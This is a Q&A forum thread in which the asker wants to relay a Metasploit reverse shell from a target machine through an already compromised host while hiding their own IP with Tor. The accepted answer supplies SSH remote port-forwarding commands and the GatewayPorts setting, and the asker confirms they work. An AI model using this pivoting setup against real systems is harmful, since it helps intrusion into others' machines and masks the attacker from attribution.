# Redirect metasploit traffic through a compromised host

Tags: ssh, networking, port-forwarding, metasploit

first of all I want to say that my issue is not about the 'Portfwd' option of the meterpreter: https://www.offensive-security.com/metasploit-unleashed/portfwd/

Lets say I have access to 2 computers:
- Computer A is mine and is running linux.
- Computer B is a compromised host and is also running linux.
- Computer C is the one I want to compromise.

I am using metasploit framework for this purpose. How can I achieve setting a reverse tcp connection from C to B and then connect from A to B to grab the meterpreter session ? The thing is, I don't want B to know the ip address of A at any point. That is why it's A which will have to start the connection (using proxychains or any other program to hide its real IP).

First I tried to reproduce this problem using netcat but maybe I have misunderstood something there:
- Computer A is running a netcat server on port 4444: `nc -l -p 4444` (because A will run the meterpreter server).
- Computer C will connect to B on port 8888 `nc 'B' 8888` (because C will execute the payload and will connect to the compromised server so it has no link with my real IP)
- Computer B will have to set up a netcat listener on port 8888 to accept a tcp connection from C (I am not sure about this one)

Now my question is: how can I get the connection between B and A without B knowing the ip address of A.

I tried to use ssh to do a local port fowarding from A to B:
`torify ssh -NL 4444:localhost:8888 B` but it is telling me that the port 4444 is already used (by the nc listener on A)
I drew a simple scheme so maybe it will be more clear, the following scheme is what I would like to have:
[image: port fowarding]

Answer (score 2, accepted):

So, you want to forward port *B:8888* to *A:4444* from server *A*,

```bash
A:$ ssh -R 8888:localhost:4444 B
```

This opens port *8888* listening on *B* and forwards connections to port *4444* on *A*, where your server is. This works if the `ssh` server in *B* has the configuration option `GatewayPorts` set to *yes*.

If `GatewayPorts` is set to *clientspecified* you could use one of the following commands,

```bash
A:$ ssh -R  :8888:localhost:4444 B
A:$ ssh -R *:8888:localhost:4444 B
```

`GatewayPorts` unset or set to *no* binds the *socket* to `localhost`, preventing the remote forwarding to work.

Comment: I forgot to mention that I also tried this solution but when I do that, even if the port 8888 appears open on B (using netstat) it is not when I try to connect from A to B. It says 'connection refused' which make me think the port is closed (nmap also said the port look like closed). And I know it is not a firewall issue since I can open the same port using a netcat listener and I will be able to connect to it from A this time. If it can help B server is a virtual private server.

Comment: Adjust the configuration of  the ssh server in B to set the option GatewayPorts to "yes".

Comment: You were right this was the only thing missing here ! Now it is working like a charm thanks !

Comment: Answer edited to include info about GatewayPorts